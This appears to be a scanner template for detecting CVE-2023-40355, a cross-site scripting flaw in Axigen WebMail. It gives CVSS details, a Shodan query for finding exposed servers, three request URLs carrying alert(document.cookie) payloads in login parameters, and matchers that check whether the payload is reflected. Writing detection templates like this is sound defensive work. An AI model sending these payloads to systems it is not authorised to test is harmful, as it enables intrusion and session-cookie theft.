id: CVE-2023-40355 info: name: Axigen WebMail - Cross-Site Scripting author: amir-h-fallahi severity: medium description: | Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions. reference: - https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html - https://nvd.nist.gov/vuln/detail/CVE-2023-40355 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2023-40355 cwe-id: CWE-79 epss-score: 0.0006 epss-percentile: 0.22931 metadata: max-request: 3 verified: true shodan-query: http.favicon.hash:-1247684400 tags: cve,cve2023,xss,axigen,webmail http: - method: GET path: - "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.cookie),//" - "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.cookie),//" - "{{BaseURL}}/index.hsp?m=',alert(document.cookie),'" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "\\\\'-alert(document.cookie),//" - "',alert(document.cookie),'" condition: or - type: dsl dsl: - 'contains(header, "text/html")' - 'contains(response, "Axigen")' - 'status_code == 200' condition: and